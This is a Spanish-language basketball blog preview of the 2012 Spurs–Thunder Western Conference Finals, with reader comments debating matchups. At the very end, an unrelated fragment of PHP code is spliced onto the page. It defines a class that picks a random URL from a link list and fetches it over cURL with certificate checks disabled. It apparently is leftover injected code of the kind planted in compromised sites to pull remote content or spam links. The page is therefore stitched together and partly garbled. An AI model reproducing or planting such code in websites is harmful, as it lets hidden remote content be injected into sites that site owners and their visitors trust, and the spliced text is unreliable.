Análisis Spurs (1) – Thunder (2)

26 de May de 2012 por Sancho88

Regular: 2-1

Spurs: 103.7 PF – 96.5 PC
Thunder: 103.1 PF – 97 PC

La madre de todas las batallas comenzará en menos de 24 horas, la Final de la Conferencia Oeste, la eliminatoria que puede ser el salvoconducto hacia la gloria, hacia la gloria de unos señores que buscan alzarse con el quinto anillo en tres décadas diferentes, o de unos muchachos que quieren escribir su propia historia desde ya.

Los Spurs están reescribiendo la suya propia, esa que nació en 1999 con las ‘Twin Towers’, con Tim Duncan al lado de un tipo al que llamaban ‘El Almirante’ porque, efectivamente, era marine. El mejor ala-pívot de la historia llega hasta nuestros días acompañado por el base francés más americano de todos los tiempos, Tony Parker, y la coronilla sagrada de un escolta llamado sangre, que se apellida aniquilación: Emanuel Ginóbili. Nada saben de compasión.

Los Thunder son su último obstáculo para volver a cruzar esa bocana de vestuarios y ver a lo lejos el gran trofeo dorado. Es año de ‘lockout’, es año de asterisco, no es año impar, pero este es su año, 2012, el año de los Spurs, el año del Álamo indestructible, de Greg Popovich como entrenador del año, del quinteto ideal injusto y olvidadizo, de las 18 victorias consecutivas, de la terna de quintetos que se dejaron en el tintero a una gloria que ha rubricado algunas de las mejores batallas de la pasada década en la NBA, que nació en un lugar exótico llamado Islas Vírgenes y que ahora querrá convertirse en leyenda inolvidable, en mito, en dinastía. San Antonio buscará su quinto anillo, su número impar, el número sagrado para los “Espuelas”. Y en el centro de toda la mística y las miradas, Tim Duncan, y todos a su alrededor esperando ver un milagro a los 36 años de edad. La particular versión baloncestística del ‘Invictus’ de Clint Eastwood ya ha igualado un record histórico en la NBA, convirtiéndose en el cuarto equipo capaz de ganar dos eliminatorias consecutivas por 4-0.

Ahora sobran los verbos, los tópicos de las previas, y nace la prosa poética, porque el verbo olvida la poesía, la conexión perfecta de la experiencia, el juego jamás soñado por un equipo que ganó varios anillos en 2003 y 2005 promediando apenas un 30% de efectividad en los tiros de campo, y que ahora las enchufa desde fuera con más del 50% de acierto (así fue en la regular contra estos mismos Thunder). Es la metamorfosis kafkiana de la fea larva competitiva que todo el mundo odiaba hace unos años, pero que un día creció y se convirtió en una magnífica y esplendorosa mariposa, en la más bonita de todas. Claro que, cuando las mariposas preciosas vuelan, no tienen mucho tiempo para exhibirse. La belleza marcará el fin, aunque éste sea maravilloso. Volarán muy lejos, y finalmente, pase lo que pase, nada volverá a ser lo mismo cuando noviembre llegue con su frío justiciero, y les ponga en la perspectiva de una temporada sin asterisco, larga y competitiva, donde será muy difícil volver a contemplar el delicioso vuelo de las espuelas en otoño.

Enfrente, unos chiquillos con red de palo largo intentarán cazar a las bonitas mariposas. Son jóvenes, son irreverentes, saben luchar. Observan la historia desde sus tiernos 20 años y quieren ser parte de ella. También lo tienen todo, tienen menos años, más descaro, músculos más fuertes, más pulmones para remar en una eliminatoria que se presume larga, agónica, al mejor de todos los partidos. ¿Final anticipada? Seguramente.

Pocos puntos flacos, pocas carencias, pocos defectos en ambos. Todo parece rozar la perfección y nada es seguro en esta serie. Oklahoma supo sufrir durante el último mes para al final ceder una sola tarde contra el genio que se apaga de Kobe Bryant, pero se les intuye instinto asesino, pues han sabido moverse con éxito en no menos de 5 partidos apretados contra gallos del Oeste como Mavericks y Lakers. Su camino ha sido más tortuoso y esforzado, pero están en la Final de Conferencia con todos los honores. Russell Westbrook es su base, por fin es base, por fin conecta con el alero del nuevo milenio, Kevin Durant, ese que será el ídolo de los jóvenes que hoy son jóvenes cuando en 2020 o 2025 haga hazañas de mayores, como esta de Tim Duncan y compañía. Junto a ellos, el hombre con barba de 500 días que no perdona, y la última esperanza del continente africano, ‘Air’ Congo, que vuela con sus brazos infinitos para convertirse en el mejor pegamento posible para la defensa de su equipo. Tienen sus opciones, y seguramente jueguen todas las manos de la partida hasta el final. De entrada, es imposible enterrarles.

Claves de la eliminatoria

– Músculo contra talento: Para los más viejos del lugar, se nos hace raro hablar de músculo y no referirnos a San Antonio, y hablar de talento y dar con la palabra adecuada para definir a estos Spurs, cuando de toda la vida de Dios ha sido al revés por definición. Bowen, Udoka, Elson, Mohammed (que ahora defiende la camiseta de los Thunder)… ese era el esquema tipo en el periodo de la larva. Como diría Montes… “¡Más madera!” Pero ya sabemos, ahora son mariposas volando, ahora todo es precioso y todo es talento. Los Danny Green, Boris Diaw, Stephen Jackson, Gary Neal o Tiago Splitter, acompañan con su calidad a la primera línea de fuego. Talento por todos los poros y juego en equipo como filosofía. Para los Thunder, una palabra debería grabarse a fuego en sus mentes: dureza. Deben ser duros y además aparentarlo para intentar asustar a los colosos Spurs. Les toca cazar las mariposas texanas a cañonazos. Tienen la fuerza bruta que solo da la juventud, deben ganar por aplastamiento, por ritmo imposible, por asfixia en defensa, por Ibaka, por James Harden, por Westbrook, por Kevin Durant. Es su única opción, apretar las tuercas al máximo, apretar los dientes e intentar anular las mil vías de anotación de los Spurs. Muy difícil, no obstante, cuando todas esas vías aparecen por talento.

– Dos ‘killers’ con aroma de 6º hombre: James Harden y Manu Ginóbili. El sexto hombre de la NBA siempre ha sido un jugador particular. Suelen tener un carisma especial, a lo Ray Allen. Gente que juega diferente, que no necesita al equipo, que te puede resolver cualquier partido por muy fea que esté la cosa. Estos dos hombres se enfrentarán en esta eliminatoria, y pueden resultar claves para sus equipos. Son extremadamente difíciles de defender y decisivos al 100%.

– Playmakers a la velocidad de la luz: Tony Parker corre a más de 32 km. por hora con el balón en las manos. Lo demostró de sobra en el concurso de habilidades. Tiene el record de velocidad entre los bases. Pero Westbrook no se queda atrás y es muy difícil pararle con su cambio de ritmo. Sin duda, si el duelo de semifinales entre Parker y Paul despertó mucha expectación, en este vamos a saber lo que son dos ‘playmakers’ ‘picados’ entre sí. Seguramente, en muchos momentos de la serie veamos ráfagas de muchas jugadas seguidas donde se reten al sol como en un ‘Western’. ¿Quién pega más fuerte? Los dos. ¿Qué primará, la sabiduría, la experiencia y la clase de Parker, o el ímpetu, potencia y descaro de Westbrook? Lo seguiremos muy de cerca. Prohibido perderse el duelo.

– Ola de calor en la pintura: Van a saltar chispas en la zona. Tras las dudas generadas durante toda la temporada sobre la capacidad defensiva de Ibaka y Perkins, parece que en los Playoffs se han puesto las pilas, y junto a Durant, han sido capaces de anular el juego interior de los Lakers. Veremos si pueden hacer algo contra una rotación tan larga y de calidad como la de los Spurs, con un hombre clave que es Tim Duncan, pero con otros pívots dominantes como Splitter desde la segunda línea, lo que pueda aportar Blair, que si juega podría hacer mucho daño, o la aportación de Diaw y Bonner como 4’s abiertos. Deberán cuidar sus faltas porque si no San Antonio se dará un homenaje cerca del aro.

– ¿Leonard contra Durant? Artest lo intentó, pero el resultado fue infructuoso. Ahora muchos ponen la responsabilidad y las esperanzas en el joven ‘rookie’ de los Spurs. Desde luego, parar a Durant es muy difícil, y hay otras alternativas para ganar a los Thunder. Algún sistema ‘trampa’ sobre Westbrook para obligarle a arriesgar pases y perder balones parece más factible, pero la misión de Leonard debe ser molestar al crack de los Thunder y puntear sus tiros. Si Durant sigue a su ritmo, es decir, en un 50% en tiros de campo, la cosa se puede complicar. Leonard posee un gran físico, puede bajar a defender rápido en transición y puede impedir canastas fáciles de Durant si se emplea a fondo y no pierde la concentración. Quizá sea la tecla que apague todo el sistema de los Thunder.

Pronóstico

La eliminatoria tiene todos los ingredientes para durar 7 partidos. El 4-3 sería el resultado más lógico posible.

Comenta

18 comentarios a esta entrada

  1. Pop dice:
    #1

    Felicidades, txusma. El mejor análisis previo que he leído en mucho tiempo.

    Dicho esto, la serie promete de verdad. A ver si me las arreglo para no perderme ni uno.

      Citar

  2. txusma dice:
    #2

    Pop:
    Felicidades, txusma. El mejor análisis previo que he leído en mucho tiempo.

    Por Dios, las felicitaciones para Sancho!

      Citar

  3. nba dice:
    #3

    Por fin Westbrook se va a enfrentar en estos playoffs a un base que le pondra las cosas dificiles.
    Veremos si por fin aparece el Thiago que todos sabemos que puede ayudar a los Spurs a pasar esta serie.
    En el otro bando, seran capaz Brooks y los Thunder de darse cuenta del panico que puede sembrar en la zona rival Ibaka encarando la canasta con el balon en las manos ??, si lo consiguen tendran alguna opcion sino, a esperar otro año, porque nadie como los Spurs tiene tanto y tan variados jugadores capaces de anotar.

      Citar

  4. melo15 dice:
    #4

    Pues yo no creo que esa sea la clave de la eliminatoria, es verdad que le tendrian que dar mas balones a Ibaka, pero la clave en mi opinion, es obligar a correr a los Spurs, muchos de sus jugadores clave: Duncan, Ginobili, Bonner, Diaw son mayorcetes y el cansancio conduce a errores defensivos, menos intensidad en el rebote, perdidas tontas…

      Citar

  5. HisRoyalAirness dice:
    #5

    Tremendo análisis Txus, estoy con lo que dice Pop.

    Creo que es una de las series que más ganas tengo de ver en mucho tiempo. Como dicen en la TNT, es la final anticipada.
    Mi opinión es que los Thunder sólo tienen una opción para llevarse partidos: Durant. Hace falta sangre fría y efectividad y el berenjenal que le va a montar Popovich a Westbrook va a ser demencial; creo que va a bajar mucho su acierto y va a perder muchos balones.
    En la pintura me parece a mí que no va a haber color. Timmy no es Bynum ni Gasol por lo que dudo mucho que los árbitros permitan a Perkins repartir a su ritmo y sin faltas no lo para en su vida. A Ibaka creo que le va a sacar bastantes faltas de perro viejo por sus ganas de taponar.

    La plantilla de Spurs es muuuuy, muy amplia y el único punto débil que le veo es la defensa a Durant

      Citar

  6. HisRoyalAirness dice:
    #6

    Oye, qué es eso de que Ibaka tire más y que encare el aro? Estáis locos? Que anoten los que tienen que anotar que al final siempre pasa lo de tener la bandera delante de los ojos. Ibaka tiene el tirito de media distancia pasable pero ofensivamente es muy limitado. Mucho.
    Se pone a encarar el aro o a intentar tirar por encima de Duncan y se terminó la eliminatoria antes de empezar. Si quieren tener una mínima posibilidad que se dedique a lo suyo

      Citar

  7. Esteban dice:
    #7

    el punto debil la defensa de durant? durant es indefendible, creo que el jugador mas indefendible que en visto, lebron tiene q acercarse al aro y alli puedes esperarlo con mucha gente para ponerle las cosas feas, kobe anota a distancia pero ultimamente es su ionuco recurso y si le marcan el tiro no puede penetrar

    durant con sus 2.06 y su facilidad para tirar a distancia no tiene defensor capaz de enfretarsele en el mundo, lo unico que puedes hacer es ponerle la mano en la cara y rezar que falle, similar al tiro del flamenco de dirk

    la unica que queda es pegarle y mucho y tratar de q no reciba una vez que recibe estas a tu suerte

      Citar

  8. HisRoyalAirness dice:
    #8

    La defensa A Durant

      Citar

  9. txusma dice:
    #9

    El martes añadiré la foto de portada. Los fines de semana son un poco locura…

    Enorme análisis Sancho!!

      Citar

  10. nba dice:
    #10

    Señores, pues yo cuento con que Westbrook va a acabar desquiciado gracias a Popovich, que Harden aportara lo suyo y que Durant se echara el equipo a las espaldas, pero necesitaran a alguien del juego interior que aporte, y no es tirar de patriotismo pero Ibaka ha demostrado que puede anotar, es que sino sera demasiado facil para los Spurs

      Citar

  11. Pop dice:
    #11

    txusma: Por Dios, las felicitaciones para Sancho!

    Juraría que cuando leí el artículo aparecía firmado por ti… Rectifiquemos, pues: felicidades, Sancho. He disfrutado leyendo esta previa!

      Citar

  12. MagicJohnson32 dice:
    #12

    Magnífico texto, Sancho, lleva tu estilo impregnado de arriba abajo. Felicidades.

    Creo que los Spurs no se van a preocupar tanto de la defensa sobre Durant como por frenar a Westbrook y los puntos en contraataque y transición de los Thunder. Además, a SAS no le va nada mal que se juegue a puntuaciones altas. Al contrario: difícil lo tendrán OKC si los partidos van a 220 puntos.

    Y por el otro lado… pues no sé qué planea Brooks ante el ataque de los Spurs. La única manera que veo es dominando absolutamente el rebote y consiguiendo muy buenos porcentajes de tiro, de manera que Parker no pueda correr. Y aun así, el triple desde la esquina, que siempre ha sido una de las jugadas favoritas de Popovich, es este año más indefendible que nunca.

      Citar

  13. Sancho88 dice:
    #13

    Muchas gracias a todos. De verdad, me alegra muchísimo que os gusten mis textos, porque cuando los escribo y los mando digo… dios, otra puta ida de olla. Además, aquí forcé bastante y pudo salir la cosa mal, jajaj. De todas maneras, sigo considerándome un analfabeto de la NBA en comparación a lo que hay por aquí, y no va con falsa humildad. Cuando me pongo a escribir pienso…. uffff, en realidad me podéis meter por todos los lados. Lo seguiré diciendo durante mucho tiempo, yo comento por aquí porque me encanta el basket y la NBA cada día más y trato de poner mi punto un poco histriónico al asunto, pero lo que más adoro es sentarme a leer los debates y aprender cada día un poco más. El nivel de conocimiento y análisis por aquí es terrible, pues nadie tira de tópicos o de comentarios estúpidos y se analiza todo con frialdad, cabeza y bastante objetividad y acierto. Lo digo cláramente, para mí esta página debería ser top en NBA en este país. Se ve un curro tremendo en cada pieza.

    Hoy empezará una serie que yo pienso que va a ser muy larga, donde hay muchas balas guardadas y yo sé que Popovich no se va a reservar absolutamente nada. San Antonio debe intentar aprovechar su superioridad en la zona, tiene mucha más calidad y debe jugar fácil in and out mucho con Duncan y Splitter, y que otros hombrs como Manu, Jackson o Neal se aprovechen de ello. Creo que la defensa que puede plantear Popo sobre Westbrook, esa ‘trampa’ como yo digo, puede ser a través de Danny Green, o al menos así lo aseguran algunos expertos. Supongo que Parker saldrá con Sefolosha y a partir de ahí, estoy 100% seguro que el duelo de sextos hombres va a ser mortal, cada vez que salga Harden saldrá Manu y viceversa, se van a marcar uno al otro y pueden saltar chispas. Durant parece la gran clave de la eliminatoria. Si él está bien, OKC tiene sus opciones, pero si no lo está, esto puede durar menos de lo que nos pensamos.

      Citar

  14. txusma dice:
    #14

    Pop: Juraría que cuando leí el artículo aparecía firmado por ti… Rectifiquemos, pues: felicidades, Sancho. He disfrutado leyendo esta previa!

    Sí, sí. Hubo un error y el artículo apareció firmado por mí pero en cuanto leí tu comentario lo rectifiqué.

      Citar

  15. HisRoyalAirness dice:
    #15

    Yo pensé que había puesto Sancho, es más, sabía positivamente que era suyo!

      Citar

  16. tebias dice:
    #16

    Sinceramente, enhorabuena por este artículo.

    Llevo diciéndole a un muy buen amigo que lleva una web bastante concurrida sobre la NBA que hay algo que le falta a esa web, y es precisamente esto: pasión y escribir los hechos (pre-partido, resumen y post) con corazón.

    Enhorabuena de nuevo.

      Citar

  17. simon dice:
    #17

    Enhorabuena Sancho! sensacional analisis!

      Citar

  18. GreenPride dice:
    #18

    Bueno pues llego a tiempo para comentar la serie pues todavía no he visto el primer partido jugado anoche y que veré esta tarde (qué ganas).
    Esta es la serie más apasionante de estos PO hasta ahora y podría decidir el título (aunque yo creo que los Heat tienen sus opciones en la final). Una serie con muchos contrastes entre ambos equipos, dos maneras de jugar y muchas incógnitas por resolver.
    Para mi algunas de las claves son:
    1) Defensa de los Spurs sobre Westbrook: Prácticamente seguro que no le defenderá Parker. Yo creo que empezará sobre él Danny Green y luego ya veremos, quizás Gary Neal o incluso Stephen Jackson. Clave para los Spurs forzar a Westbrook a penetrar y tomar malas decisiones que provoquen pérdidas no dejándole que les mate con su juego de media distancia que tanto ha mejorado (aquello que tan mal hicieron los Lakers)
    2) Defensa de los Thunder sobre Parker: Imprescindible para ellos que Parker no haga su juego fácil y que no pueda correr. Los Thunder son muy fuertes físicamente y deberían presionar mucho en el rebote ofensivo y parar rápido el balón en las salidas de los Spurs para obligarles a jugar en media cancha. Creo que pueden hacerlo bastante bien en este aspecto.
    3) Anotación distribuida y passing-game de los Spurs: Los Spurs son unos maestros moviendo el balón y aprovechando las ventajas en ataque, los Thunder deben intentar que no anoten canastas fáciles y que sus interiores defiendan eficazmente 1×1 a Duncan para no permitir tiros abiertos de Neal, Jackson, Green, Ginobilli y demás.
    4) Duelo de sextos hombres y banquillos: El banco de los Spurs es muy profundo y tiene un super-clase como Manudo. El de los Thunder no lo es tanto pero tiene buenos especialistas como Mohammed, Collison o Fisher y otro superclase como Harden. Ambos sextos hombres son esenciales para sus equipos, llevándo muchas veces el ritmo de sus ataques y además juegan en la misma posición con lo que probablemente se defenderán por lo que este duelo puede ser clave en la serie.
    5) Tempo de las series: Los Spurs han demostrado este año que pueden jugar a toda pastilla y tienen más rotación de hombres pero los Thunder tienen jugadores más físicos así que unas series a alto ritmo no está claro a quién benefician.
    6) Partidos igualados y clutch: Los Thunder están más probados pues han decidido muchas victorias en los últimos minutos en estos PO. Los Spurs llegan sin necesitar visitar el clutch. Aquí parece que los Thunder tengan más recursos con Harden moviendo la bola y Westbrook y sobre todo Durantula matando desde las alas pero llegado el momento veremos si la clase y sabiduría de Manudo y Duncan no imparten su clase.
    En definitiva series apasionantes y de pronóstico super incierto. Como casi todos espero unas series muy largas, probablemente llegando al 7º y ahí me resulta casi imposible jugármela pero como es gratis voy a apostar fuerte por Durantula dando el paso definitivo al estrellato en el 7º en El Alamo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>